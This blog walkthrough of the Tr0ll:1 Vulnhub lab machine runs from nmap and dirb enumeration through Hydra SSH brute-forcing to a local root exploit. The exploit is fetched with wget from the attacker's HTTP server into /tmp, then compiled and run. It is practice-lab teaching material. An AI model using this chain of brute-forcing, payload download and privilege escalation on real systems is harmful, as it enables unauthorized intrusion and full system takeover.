Tr0ll:1 Vulnhub Walkthrough

Share on facebook
Facebook
Share on twitter
Twitter
Share on linkedin
LinkedIn
Share on whatsapp
WhatsApp

Hello Everyone, In this blog i am posting the walkthrough of Tr0ll. This machine is for beginners.

You can Download the machine here.

So, let’s begin!!

Target IP is 192.168.43.199

Attacker IP is 192.168.43.139

Let’s scan the target ip using nmap .

nmap -sC -sV -pn 192.168.43.199

So, there are three ports open 21,22 and 80 and service running on them are ftp, ssh and http.

Let’s check on port 80 as some website is running on it.

huh!! it’s just an image Trolling us.

So, I used dirb if there are any hidden directories.

dirb http://192.168.43.199

here, is the result.

/secret/ looks interesting , let’s check this in the browser.

Hmm !! It Trolled us again.

I was curious to know what’s going on. So, i used Wireshark to analyze the packets.

I found some plain text in a packet, if we read it carefully it says “you almost found the sup3rs3cr3tdirlol “.

looks like sup3rs3cr3tdirlol is a directory. Let’s check opening this in a browser,

So, there is a file roflmao .

I downloaded it, its a LSB executable file.

With the help of the strings command i explored the file,

strings roflmao

Result says, Find address 0x0856BF to proceed .

Let’s check this in the browser,

It contain two folders goodluck/ and this_folder_contains_the_password/

Ok, Let’s open goodluck/ folder,

It contains a text file, it seems to be usernames.

The other folder this_folder_contains_the_password/ seems to contain passwords.

We got trolled again.

As the second folder itself says this_folder_contains_the_password, so i assumed “Pass.txt” might be the password.

So, I downloaded which_one_lol.txt .

Now, let’s Bruteforce ssh using the tool Hydra .

hydra -L which_one_lol.txt -p Pass.txt 192.168.43.199 ssh

Yes, it worked.

we got the login credentials for ssh. now, let’s login to the system.

We got shell, Now let’s enumerate to find the kernel version

lsb_release -a

Now, let’s find exploits for this verion.

So, i used a command searchsploit to find the exploits for the Version.

searchsploit 14.04

Let’s download the exploit 37292.c

searchsploit -m 37292.c

The exploit will be downloaded on your directory.

Now, all you have to do is make the exploit run on the user shell we got.

Let’s start HTTPServer .

python -m SimpleHTTPServer 8080

HTTP server is started on port 8080.

Let’s go back to shell and download the exploit using wget.

here, you should go to /tmp dir to download the exploit.

cd /tmp

wget http://192.168.43.139:8080/37292.c

Let’s Compile the exploit using gcc compiler and execute it.

gcc 37292.c -o exploit

chmod +x exploit

./exploit

Damn, i got ROOT access.

Writer: Anudeep is a Cyber Security Intern at Azure Skynet Solutions Pvt Ltd. You can contact him here.

Share on facebook
Facebook
Share on twitter
Twitter
Share on linkedin
LinkedIn
Share on whatsapp
WhatsApp

2 thoughts on “Tr0ll:1 Vulnhub Walkthrough”

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top